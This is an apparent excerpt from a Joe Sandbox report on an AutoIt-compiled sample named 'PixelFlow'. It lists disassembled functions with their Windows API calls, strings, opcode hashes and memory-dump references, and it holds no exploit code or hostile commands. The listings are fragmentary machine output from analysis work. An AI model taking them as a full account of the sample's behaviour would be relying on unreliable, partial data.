Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: g
API String ID: 3814560230-3996484483
Opcode ID: 58534f570039e18fb3324a32369a8019d91dcce77a1cab18d400481472bdeb70
Instruction ID: 39afb895d97ee21b3bcb5b7e9158e4d42553d6ba5cda8471613969131cedf3c5
Opcode Fuzzy Hash: 58534f570039e18fb3324a32369a8019d91dcce77a1cab18d400481472bdeb70
Instruction Fuzzy Hash: 8321F8752042019FDB14AF28D8A5AB677E6EF9A320F20571DF9A6873A0D730A801DB64

Function 00686FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00602111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0060214F
Part of subcall function 00602111: GetStockObject.GDI32(00000011), ref: 00602163
Part of subcall function 00602111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0060216D

GetWindowRect.USER32(00000000,?), ref: 0068705E
GetSysColor.USER32(00000012), ref: 00687078

Strings

static, xrefs: 0068703B

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: c8b0afdc61a026b28a7a81ae361231732641d6b11da871d3d6f5ea09ebd9c662
Instruction ID: cdaa440e18561bc540b56a3058654175707676e25a045bb3cc3b128811ed6bde
Opcode Fuzzy Hash: c8b0afdc61a026b28a7a81ae361231732641d6b11da871d3d6f5ea09ebd9c662
Instruction Fuzzy Hash: 8421477261420AAFDF04EFB8CC45EFA7BAAFB08304F105619FE55D2240E635E850DB50

Function 00686D0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00686D8F
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00686D9E

Strings

edit, xrefs: 00686D73

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 929acf1b207153b0f1fe62619d744adcd39f41a87cb53dadcba71262454acc09
Instruction ID: 6b0fb8c96976c95077426dfa58ebbbf027e7b5188ff9b224761e816116372259
Opcode Fuzzy Hash: 929acf1b207153b0f1fe62619d744adcd39f41a87cb53dadcba71262454acc09
Instruction Fuzzy Hash: DB113A71600208AFEF50AF64DC85AFB3A6BEF05368F204714FA64972E0C7759C919B60

Function 00662FC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00663036
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00663055

Strings

0, xrefs: 0066302C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 28b5a779e6d91554c5fd07213c1d6bfe67baabdf9b124fdab641f7c32fe0675a
Instruction ID: a75312f6c6c112e4c46ca7a31580ab61a3cc514b18290400269dee5c820ed734
Opcode Fuzzy Hash: 28b5a779e6d91554c5fd07213c1d6bfe67baabdf9b124fdab641f7c32fe0675a
Instruction Fuzzy Hash: E711B231901224ABDB24DF9CDC44FED77BBAB06718F140025F954A73A0D770AE49C7A5

Function 006034E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0060351D
DestroyWindow.USER32(?,?,00614E61), ref: 00603576

Strings

hi, xrefs: 006034E5

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: hi
API String ID: 2587070983-1546199359
Opcode ID: 4c2b5daf19cdca2b74d9fb94364aa12157cc9513d67f6bdafa482436dc1b3e1d
Instruction ID: 0205c6fd7d5047b6a09887d5be9479679911d27a07f60beb951d9d352fff87a7
Opcode Fuzzy Hash: 4c2b5daf19cdca2b74d9fb94364aa12157cc9513d67f6bdafa482436dc1b3e1d
Instruction Fuzzy Hash: F421F9706822208FDB2DDF15EC64E7A33EBAB45316B04552DF8068B3B0DB21DE41CB69

Function 00672686 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006726DC
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00672705

Strings

<local>, xrefs: 006726CD

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 94ffda12e9a42a261cdc40187a60e911dd25c7046a6b0355e9bec37ebeb91359
Instruction ID: 7078d48120bb97dfec391ea84b5676cb9c03a96ab3e76ed6478477439f6e66b4
Opcode Fuzzy Hash: 94ffda12e9a42a261cdc40187a60e911dd25c7046a6b0355e9bec37ebeb91359
Instruction Fuzzy Hash: 61119170501226BBDB248F518CA4EF7FBAEFB15751F20811BF90946540D2706995CAF0

Function 0066CF83 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0066CFED

Strings

L,i, xrefs: 0066CF9B
0.0.0.0, xrefs: 0066CFFB

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _wcscmp
String ID: 0.0.0.0$L,i
API String ID: 856254489-3219127848
Opcode ID: cbc51b8e3d8f43b0c1291b8d37bc53709aecbd7725e08063d4ff6c0275e760fb
Instruction ID: 9fe164c69794dc6e1ce6e070250bccafad41aa88e17819e9547ead6aab716edd
Opcode Fuzzy Hash: cbc51b8e3d8f43b0c1291b8d37bc53709aecbd7725e08063d4ff6c0275e760fb
Instruction Fuzzy Hash: CE11C475700214EFCB58EF55C981EAAB7ABAF85710F10804DFA455B392DA30ED42CB54

Function 0067823D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006784A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00678265,?,00000000,?,?), ref: 006784BF

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00678268
htons.WSOCK32(00000000,?,00000000), ref: 006782A5

Strings

255.255.255.255, xrefs: 00678280

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: e2411f81d7e80c5d3d421f774dfb650a490f79678f42ab0c60e0b2e7dcc4b40d
Instruction ID: 026a08a994f9683002075426042d07d46f4a74dcc6bbf26ff0af6483bfe56339
Opcode Fuzzy Hash: e2411f81d7e80c5d3d421f774dfb650a490f79678f42ab0c60e0b2e7dcc4b40d
Instruction Fuzzy Hash: 7011C270540205AFDB10AF94DC4ABFDB766EF04321F10851AEA259B392DA71A905C695

Function 006597A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Part of subcall function 0065B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0065B5A0

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0065980E

Strings

ComboBox, xrefs: 006597AD
ListBox, xrefs: 006597D8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 17a7ac2ef2e44342fd9d02b29605ec15ae7f73746a9accb0d7db8c844e66317d
Instruction ID: f7eef5027d8a5f9732bf88f9ec55f8f5ad84984e5b86390d4b8db15a88871f04
Opcode Fuzzy Hash: 17a7ac2ef2e44342fd9d02b29605ec15ae7f73746a9accb0d7db8c844e66317d
Instruction Fuzzy Hash: 3A01DEB1A51218AB8B14EFA0CC228FE776BAF12360B540A1AFC61573C1EA31584CC7A4

Function 0060BBC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0060BC07

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

_wcscat.LIBCMT ref: 006434C3

Strings

cl, xrefs: 0060BC47

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: cl
API String ID: 257928180-4008018315
Opcode ID: f28fc0bb91f702ea2368789de33c4662c2e4f3f1c5af9d3acc41db25d686650d
Instruction ID: 16aa68d595e462161da1022f64c7f26959089f5c42fef282815f8e531448b711
Opcode Fuzzy Hash: f28fc0bb91f702ea2368789de33c4662c2e4f3f1c5af9d3acc41db25d686650d
Instruction Fuzzy Hash: 4F11A534940218ABCB85EFA4D842EEE77ABFF08350B1091A9B949DB291DF7097C49B54

Function 006691B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006691D4
__fread_nolock.LIBCMT ref: 006691E9

Strings

EA06, xrefs: 0066921B

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: c587173122e334c59e8561f113b68b0fb523b14d74da72308b76b5895a7e0e64
Instruction ID: e597b32c6d02fe556b67352406e544711c3328c409022ac74ea3b51eb00bb3a4
Opcode Fuzzy Hash: c587173122e334c59e8561f113b68b0fb523b14d74da72308b76b5895a7e0e64
Instruction Fuzzy Hash: 3201F971D446687EDB28CAA8DC56EFEBBFC9B15311F00419EF952D2181E474E6088B60

Function 00659698 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Part of subcall function 0065B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0065B5A0

SendMessageW.USER32(?,00000180,00000000,?), ref: 00659706

Strings

ComboBox, xrefs: 006596A5
ListBox, xrefs: 006596D0

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: d93389541617e275d3cab14e19548d60b989c78a3e242de1e7d69dd31c271912
Instruction ID: 351b014680bda2678213ad841c33034c6650d9930eb8d069490c14807b13e143
Opcode Fuzzy Hash: d93389541617e275d3cab14e19548d60b989c78a3e242de1e7d69dd31c271912
Instruction Fuzzy Hash: 7501DFB1A51108ABDB18EFA0C862AFF77AF9F16340F54001ABD0267281EE545E0CD7B9

Function 0065971D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Part of subcall function 0065B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0065B5A0

SendMessageW.USER32(?,00000182,?,00000000), ref: 00659789

Strings

ComboBox, xrefs: 0065972A
ListBox, xrefs: 00659755

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 1e2cc88c10624c76cee707a5bd5d010ff5073ba504e46afc2d29cb99f905aa7f
Instruction ID: 69fe3bd908a65b87f13ee0bfa945bbac570e39eda1a7d6c33e3e1e1c1ffa7235
Opcode Fuzzy Hash: 1e2cc88c10624c76cee707a5bd5d010ff5073ba504e46afc2d29cb99f905aa7f
Instruction Fuzzy Hash: 1C0126B1A51104ABCB14EFA0C952EFFB7AF8F16340F54011ABC01A3281EE254E0CC3B9

Function 00626CCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00626CF0
__calloc_crt.LIBCMT ref: 00626D09

Strings

@Rl, xrefs: 00626D20

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __calloc_crt
String ID: @Rl
API String ID: 3494438863-1129465463
Opcode ID: 2ddc69104d00b6f02621b7768b2336051a65d97e3aea86c6f7cbc17c4cbdb97c
Instruction ID: 51f3f15d29d040bb9ca27ff40b92ad5bc5cfb5d804fe4ed06ee340ab6f074300
Opcode Fuzzy Hash: 2ddc69104d00b6f02621b7768b2336051a65d97e3aea86c6f7cbc17c4cbdb97c
Instruction Fuzzy Hash: C6F06871709A268AF7649F29FC51AF177A7FB05720B10142AF104CA291E7B489818F98

Function 00665350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0066536E
_wcscmp.LIBCMT ref: 00665380

Strings

#32770, xrefs: 0066537A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: b2000841b34abbd0c152cdda148780795c83d2197b5649ed6f172c7171801620
Instruction ID: 92051d8aa258621460c0e89ccad4ae6ae5367a05d1df605c0daf55e6beb55598
Opcode Fuzzy Hash: b2000841b34abbd0c152cdda148780795c83d2197b5649ed6f172c7171801620
Instruction Fuzzy Hash: 3EE061735043382BE7209A95EC05FE7F7ADDB44B70F000057FD08D3141E960AA408BE0

Function 00658675 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00658683

Part of subcall function 006234BA: _doexit.LIBCMT ref: 006234C4

Strings

Error allocating memory., xrefs: 0065867C
AutoIt, xrefs: 00658677

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: c29872b777b026063bfb8c73bf50cd79a236540e43ad902e9fd39ea0856a27e4
Instruction ID: b367aba90a62ff5dcf2bb14f3905898174478dccecc3ce200fb232a83708ed77
Opcode Fuzzy Hash: c29872b777b026063bfb8c73bf50cd79a236540e43ad902e9fd39ea0856a27e4
Instruction Fuzzy Hash: BCD012722893283AE2953694BC0AFCE6A4F4B05B52F14046ABB04A75D34EE5859082D9

Function 00640181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0063FFC1

Part of subcall function 0067C4A1: LoadLibraryA.KERNEL32(kernel32.dll,?,006401AA,?), ref: 0067C4AF
Part of subcall function 0067C4A1: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0067C4C1

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 006401B9

Strings

WIN_XPe, xrefs: 0063FFD4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: a3821e6448a19400c46c6b295ee0cbcfe5ad005ac9cff2308babd5b64110b405
Instruction ID: 3a006e71f74917ca5d45d4db930fb2939479a873d9b1fdebf824c9213b338b9d
Opcode Fuzzy Hash: a3821e6448a19400c46c6b295ee0cbcfe5ad005ac9cff2308babd5b64110b405
Instruction Fuzzy Hash: 96F0ED71C05119DFDB15DF91C998AECBBFEAB09300F2450AAE502A2590C7715F45DF60

Function 00615800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19windowCOMMON

Download Yara Rule

APIs

DestroyIcon.USER32(,jl0jl,006C6A2C,006C6890,?,00615A53,006C6A2C,006C6A30,?,00000004), ref: 00615823

Strings

,jl0jl, xrefs: 00615808, 00615821
SZa,jl0jl, xrefs: 00615804

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: DestroyIcon
String ID: ,jl0jl$SZa,jl0jl
API String ID: 1234817797-2302834490
Opcode ID: ac6649659e950fb3e94d1be93e95fde24effa4586b5215e89157f012cb761a63
Instruction ID: 6362ec7597f81dac70d2091ce6e877777101f4d0951e7f138efdee85ad72c021
Opcode Fuzzy Hash: ac6649659e950fb3e94d1be93e95fde24effa4586b5215e89157f012cb761a63
Instruction Fuzzy Hash: 43E0C232014216EFE7200F48D8007D4FBFEAFA5331F288016E08146150D3B168E1CB90

Function 00685D69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00685D73
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00685D86

Part of subcall function 0066566C: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006656E4

Strings

Shell_TrayWnd, xrefs: 00685D6C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
